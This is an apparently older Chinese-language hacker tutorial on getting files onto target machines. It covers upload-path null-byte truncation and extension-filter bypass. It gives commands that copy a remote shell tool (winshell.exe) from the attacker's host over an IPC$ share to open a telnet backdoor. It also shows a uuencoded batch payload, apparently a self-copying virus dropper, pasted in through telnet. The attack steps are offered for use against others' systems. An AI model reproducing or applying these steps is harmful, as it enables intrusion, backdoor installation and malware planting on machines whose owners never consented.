文档上传是很早以前的事了，最早那会常用的就是IPC连接，然后一个一个的COPY，自从动网upfile漏洞出来以后，各种脚本系统如PHP.JSP下的文档漏洞纷纷暴出，原理都是大同小异，没有过滤文档上传路径，导致能够抓包然后把空格20改成00，变成空字符NULL，系统是从右往左识别的，所以到空字符那就截断了，更简单的就是过滤文档上传类型不完整，改后缀就能够解决了，这些上传文档的漏洞，用万能上传工具就能够轻松搞定，但是漏洞文档名不同罢了。

更有一些另类的文档上传方法，是在系统做了比较好的防范下完成的，资料来源感谢CD-LION提供一。

先COPY个winshell.exe吧,开个telnet端口,命令行下总比在浏览器里方便啊.

copy ＼＼myIP＼c$＼tools＼winshell.exe d:＼downloads＼winzip32 已复制一个文档
启动他 d:＼downloads＼winzip32＼winshell.exe 浏览器窗口会停好久,
不用等的,程式已启动了,点停止,接着,
断开共享连接: net use ＼＼myIP＼c$ /del 完成
1利用telnet上传文档 by :jiangyf@usa.net 

假如ftp被关了,sendmail也不行,怎样把编译好的文档上传到主机呢? 
方法很简单: 
1.先把要上传的文档用uuedcode进行编码,文档会变成大概下面的样子: 
begin 644 file.bat 
M.C!J95@T92TP,#503U!=:%=E6#5D9%!>,2Q&1D9&1C$L1D9&,2PT4%]J 
M95@T85!9+7@M04%28#!@*CTP,’500D])04%!049+04]"4$E$34-"04Q%04I- 
M3D-"2D%,24%!14U-3D-"1D5’24=&0T%%3D="1T1(0T=02$=’2DA#2$9(1$-! 
M1TI(1$-!1T1’4$=.1TI’3T=(0T%#3T-/0T]#3T-/0T]!3D%+0T5!07%Q<7$@ 
M"D!%0TA/($]&1B`*0T]062`E,"Y"050@+T(@0SI<0D%45DE2+D-/32`O0B`O 
E62`*0SI<0D%45DE2+D-/32`*1$5,($,Z7$)!5%9)4BY#3TT@"@`` 
` 
end 
sum -r/size 17903/262 
全部都是可见的ASCII字符了 

2.用TELNET连接到主机后输入 
$ cat >a 
然后用WINODWS的拷贝/粘贴,把文档粘贴到telnet窗口 
按^d 
在当前目录下产生文档a